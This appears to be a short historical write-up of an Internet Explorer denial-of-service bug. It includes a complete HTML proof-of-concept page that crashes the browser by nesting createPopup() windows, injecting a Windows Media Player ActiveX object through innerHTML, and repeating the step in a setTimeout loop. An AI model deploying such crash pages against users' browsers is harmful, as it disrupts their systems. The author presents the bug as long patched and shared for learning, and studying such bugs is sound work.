I was exploring unusual combinations of IE-specific APIs and found that creating a createPopup() from inside another createPopup()’s parentWindow, and then setting the inner popup’s innerHTML to include a Windows Media Player <OBJECT> element, would reliably crash the browser. The crash was reproducible with one or two innerHTML assignments and became self-sustaining once wrapped in a setTimeout loop.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>DOS_createPopup_WMP_innerHTML</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>DOS_createPopup_WMP_innerHTML</h2>
</center>
<hr />
1) Create a createPopup() inside another one using exactly this method:<br />
&nbsp;&nbsp;&nbsp;<font color="blue">var</font> <b>cPop</b> = createPopup().<font color="red">document</font>.parentWindow.createPopup();<br /><br />

2) Do (one or two) innerHTML inside the createPopup with the WMP Object:<br />
&nbsp;&nbsp;&nbsp;<b>cPop</b>.<font color="red">document</font>.body.innerHTML = '<font color="green">&lt;OBJECT classid=clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6&gt;&lt;/OBJECT&gt;</font>';

<hr />
<center>
<input type="button" value="CrashMe" onclick="crashMe();"><br />
</center>

<script language="JavaScript">
function crashMe()
{
	var cPop = createPopup().document.parentWindow.createPopup();
	cPop.document.body.innerHTML = '<OBJECT classid=clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6></OBJECT>';
	// This next call is to make sure that we crash it. Sometimes it does not crash on the first try but the second.
	setTimeout('crashMe();',1000);
}
</script>
</body>
</html>

The createPopup() API creates a special transient popup window; accessing its .document.parentWindow gives a reference back to a related window context. Creating a second popup from inside that context and then injecting a Windows Media Player <OBJECT> via innerHTML triggers a lifecycle issue: the WMP ActiveX control is instantiated in a popup document that has an unusual parent-chain, and tearing it down (or re-injecting it on the recursive setTimeout call) exposes a bug in how IE manages the COM object’s reference counting in that nested popup context.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.